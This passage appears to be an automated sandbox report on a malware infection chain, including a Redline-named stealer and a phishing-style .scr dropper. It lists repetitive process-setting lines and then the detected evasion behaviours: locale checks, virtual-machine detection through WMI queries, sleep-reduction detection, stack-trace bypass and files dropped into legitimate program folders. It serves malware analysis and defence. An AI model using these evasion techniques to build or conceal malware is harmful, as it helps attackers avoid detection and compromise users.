                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX

                            Malware Analysis System Evasion

                            barindex
                            Contains functionality to behave differently if execute on a Russian/Kazak computer
                            Source: C:\Windows\System32\alg.exeCode function: 9_2_006A52A0 GetSystemDefaultLangID, lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] 9_2_006A52A0
                            Contains functionality to detect sleep reduction / modifications
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exeCode function: 0_2_004440780_2_00444078
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exeCode function: 3_2_004440783_2_00444078
                            Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
                            Source: C:\Users\user\AppData\Local\Temp\build.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                            Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                            Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
                            Source: C:\Users\user\AppData\Local\Temp\build.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                            Switches to a custom stack to bypass stack traces
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exeAPI/Special instruction interceptor: Address: 553E234
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exeAPI/Special instruction interceptor: Address: 57B1214
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeMemory allocated: 2BE0000 memory reserve | memory write watchJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeMemory allocated: 2E20000 memory reserve | memory write watchJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeMemory allocated: 2C40000 memory reserve | memory write watchJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exeMemory allocated: 8E0000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exeMemory allocated: 1A300000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Local\Temp\build.exeMemory allocated: 1580000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Local\Temp\build.exeMemory allocated: 2FF0000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Local\Temp\build.exeMemory allocated: 1580000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeMemory allocated: 1250000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeMemory allocated: 2E90000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeMemory allocated: 4E90000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeMemory allocated: 1180000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeMemory allocated: 2A90000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeMemory allocated: 1280000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeMemory allocated: 2E80000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeMemory allocated: 3050000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeMemory allocated: 5050000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeMemory allocated: 18A0000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeMemory allocated: 3130000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeMemory allocated: 5130000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exeCode function: 6_2_00007FF848E84660 sldt word ptr [eax]6_2_00007FF848E84660
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeThread delayed: delay time: 1200000Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeThread delayed: delay time: 1199870Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeThread delayed: delay time: 1199765Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeThread delayed: delay time: 1199654Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeThread delayed: delay time: 1199531Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\AppData\Local\Temp\build.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeWindow / User API: threadDelayed 3864Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeWindow / User API: threadDelayed 5890Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\build.exeWindow / User API: threadDelayed 4164
                            Source: C:\Users\user\AppData\Local\Temp\build.exeWindow / User API: threadDelayed 5628
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8016
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1593
                            Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeWindow / User API: threadDelayed 6008
                            Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeWindow / User API: threadDelayed 3782
                            Source: C:\Windows\System32\msdtc.exeWindow / User API: threadDelayed 487
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\javaws.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\117.0.5938.132\chrome_pwa_launcher.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\chrmstp.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateComRegisterShell64.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\servertool.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files\Mozilla Firefox\pingsender.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\OSPPREARM.EXEJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\setup.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files\Windows Media Player\wmpnetwk.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files\Mozilla Firefox\default-browser-agent.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\cookie_exporter.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files\7-Zip\7z.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files\7-Zip\7zG.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Windows\System32\msiexec.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\keytool.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateBroker.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate64.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateSetup.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\117.0.5938.132\notification_helper.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\notification_click_helper.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Client\AppVLP.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_proxy.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\pwahelper.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files\Mozilla Firefox\firefox.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\pwahelper.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files\Mozilla Firefox\updater.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\kinit.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Au3Check.exeJump to dropped file
